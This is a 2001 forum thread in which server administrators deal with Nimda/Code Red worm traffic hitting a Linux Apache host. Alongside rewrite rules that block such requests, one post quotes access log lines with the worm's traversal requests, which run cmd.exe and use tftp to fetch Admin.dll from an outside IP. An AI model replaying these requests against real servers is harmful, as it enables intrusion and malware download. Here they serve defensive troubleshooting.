I've got a server getting absolutely hammered with ddos attacks. The requests are coming from all over the map, so I'm guessing the ip's are spoofed.
The files requested are cmd.exe and root.exe...but it's a Linux box. This is killing Apache. It keeps dying, then comes up, only to get hammered again.

Does anyone have ANY ideas on what I can do? I'm tailing the error_log and adding those ips to hosts.deny, but I'm guessing that's not doing much good.

The really weird part is that this isn't aimed against any one site or ip. It's going thru each virtual site, somehow.

That's part of the Nimda/Code-red virus, it scans IP blocks looking for vunerable systems.

One way to stop it is to get yourself a firewall. Netscreen released an OS update for us which blocks out the Nimda/Code-Red/Code-Blue virus completely.

do you have custome 404 error page, by any chance?
Perharps this article (http://www.webmasterbase.com/article.php?aid=566) (from sitepoint) can help you ...

cheers,
:beer:

That was a great article. Thanks dektong.
Does anyone know if there's any way to add that bit about the custom error pages somewhere else, like httpd.conf? i have almost 200 sites on this machine, and it'd be a real shame to have to do that many .htaccess files.

Sbrad, I never tried this befor, but since .htaccess files work from the base up, by that I mean, you put a .htaccess file in /home it works in /home/hi/1 /home/hi/2 etc. So what you could try is making a base htaccess file, then in it the errorlog code.

The is a antihak apache module to fix this as well.

The is a antihak apache module to fix this as well.
Cool. Any idea where I can get my hands on it?

http://www.linuxd3v.net/downloads/mod_antihak-0.8-beta.tar.gz

read more at:

http://www.linuxd3v.net/article.php?sid=32&mode=thread&order=0

That looks perfect. How would I install it? Couldn't find that anywhere.

Are you running WHM / Cpanel?

Sure am.
I took a novel approach and read the directions. :)
Got errors, though. Is there a way to do it with WHM?

Here is what I have done. Tell me what you think of this approach. In my httpd.conf

# piss-off worms
RewriteCond %{REQUEST_URI} (cmd\.exe) [OR]
RewriteCond %{REQUEST_URI} (root\.exe) [OR]
RewriteCond %{REQUEST_URI} (\.ida) [OR]
RewriteCond %{REQUEST_URI} (Admin\.dll)
RewriteRule ^.*$ /path/to/my/server/root/empty\.txt [L]

And then...

cp /dev/null /path/to/my/server/root/empty.txt

A few lines from my access_log shows that zero bytes were served:

64.169.117.150 - - [10/Oct/2001:20:43:03 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 0
64.169.117.150 - - [10/Oct/2001:20:43:07 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2064.169.116.51%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 0
64.169.117.150 - - [10/Oct/2001:20:43:12 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2064.169.116.51%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 0
64.169.117.150 - - [10/Oct/2001:20:43:16 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2064.169.116.51%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 0
64.169.117.150 - - [10/Oct/2001:20:43:21 -0400] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 0

<<edited>>

I guess I could have just put /dev/null into the RewriteRule :rolleyes:

Originally posted by freakysid


<<edited>>

I guess I could have just put /dev/null into the RewriteRule :rolleyes:

Here's what we did, to filter that stuff out of existence:


RedirectMatch ^.*\.(dll|ida).* > dev/null
RedirectMatch ^.*\cmd\.* > dev/null
RedirectMatch ^.*\root\.* > dev/null


Helps to keep the error log situation under control, and the users don't have to see the continuous requests.

Are you saying that the module is no use?

So, is the antihak module working? And does it work with Cpanel/WHM?

Originally posted by Annette


Here's what we did, to filter that stuff out of existence:


RedirectMatch ^.*\.(dll|ida).* > dev/null
RedirectMatch ^.*\cmd\.* > dev/null
RedirectMatch ^.*\root\.* > dev/null




Hi Annette,

Do you mind me asking where you added those lines? Requests for cmd.exe are becoming plentiful on my server.

I am on a RaQ3

httpd.conf

Thank you for your help.

I tried a "find httpd.conf" and don't seem to have that one. Do I need to create it, and if so, where should I put it?